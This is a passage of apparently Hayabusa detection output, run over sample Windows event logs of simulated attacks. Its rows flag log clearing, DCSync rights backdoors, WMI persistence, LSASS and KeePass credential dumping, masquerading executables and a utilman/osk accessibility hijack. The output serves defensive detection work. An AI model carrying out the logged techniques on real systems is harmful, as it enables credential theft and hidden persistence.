C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,System log file was cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx +2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx +2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx +2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\user01\Desktop\WMIGhost.exe"" : Path: C:\Users\user01\Desktop\WMIGhost.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\scrcons.exe -Embedding : Path: C:\Windows\System32\wbem\scrcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.045 +09:00,IEWIN7,1,informational,Process Creation,"Command: sysmon -c sysmonconfig-18-apr-2019.xml : Path: C:\Users\IEUser\Desktop\Sysmon.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: Powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1088,technique_name=Bypass User Account Control : Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Users\IEUser\Downloads\Flash_update.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" : Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe /A : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: KeeFarce.exe : Path: C:\Users\Public\KeeFarce.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx +2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,System log file was cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Malicious Named Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 